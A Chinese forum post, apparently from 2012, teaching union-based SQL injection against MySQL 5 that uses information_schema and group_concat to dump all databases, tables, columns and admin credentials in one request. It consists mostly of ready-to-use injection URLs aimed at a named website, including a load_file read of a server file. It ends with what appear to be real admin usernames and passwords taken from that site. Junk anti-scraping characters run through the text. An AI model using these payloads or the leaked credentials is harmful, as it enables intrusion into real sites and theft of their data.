此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似
: T+ M9 J+ y7 M1 m# F* J但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人* ~5 m/ k* f) p& d& k. B8 x
# t* ?1 t4 @4 ]* S9 N- V- S
' C* R! i* g1 h# U. Y, N优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入/ E. k" e$ Z3 F% D% z/ U
5 ^9 p5 [# {* t/ B& |3 `' V$ ?( l缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...5 C. d2 S* i/ { E6 e
, w3 ]# u% J( h下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示
( G0 a5 G, U2 Z9 E4 a+ ~在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等5 u8 D6 {# R/ u5 Z: W
( Z( v2 R K% K
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17
' l2 H/ \( o9 `$ ^; b. R0 U4 o' p/ e% p/ |( F; \
读出所有库:
( k* ?" G: v( vhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA
0 j; K) r( q+ ]- S6 S6 Q, V6 I) q
1 ^ y% Y% u2 B$ k7 R" e! n# J1 k8 A- ?. @$ W" m4 `
1 L& J- q- J6 b' v2 R. t读出所有表:
: X9 ?5 z" ?# E7 B+ e) Shttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()% J% |% K2 [% b
5 n9 X* ^9 `6 G: P2 h2 V! P3 F
读出所有表字段:% m8 y: E5 C, d, r2 ]# `
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
$ V$ d- M, L5 a: V*/ (97,100,109,105,110)为admin的ascii码 依次类推
! i/ ?9 \# b6 z8 q9 b4 I! h; h
' |0 |; t1 y9 b, p9 O- g读出所有表字段里的内容:
2 g( \2 N4 Z7 `http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
1 Y1 I x- O8 ~* @, F) z1 `
8 ]' T0 p3 k7 x$ I; j/ p$ N/ u6 o; E" l/ e
* s/ E% M8 ]$ Q5 N) e' g& c. a3 p! O! p% c' `7 i3 B6 ~' j+ S( F
/ a( u8 v+ z# `* l/ i% p }( B& ~( I# |! W; L
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%235 ^! Z7 [( Y- \/ V$ ?$ I
0 g5 f3 }/ A7 ]$ V$ g
6 O1 k7 `# P p/ ^2 F7 ihttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%234 y- m4 ~' h) Z
4 c( _6 O; Q. F% |8 v9 U' ? F6 a( e
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%237 k* s* @4 U5 r; @$ y; ]* i, f6 E
6 g$ |! h4 M- R" b# G5 W/ m
$ V& x& y* ^# o$ T5 Z8 W' Nhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23* `( p* S3 \' i; B- ~# R
, J! l! Q6 S/ G: r; T, C
5 n1 \" K. h6 ~! }
webmaster:dzb521123,simlab:simadmin20043233
% q2 f! T! ?0 k# c3 K |
发表于 2012-9-13 16:37:34
收藏
支持
反对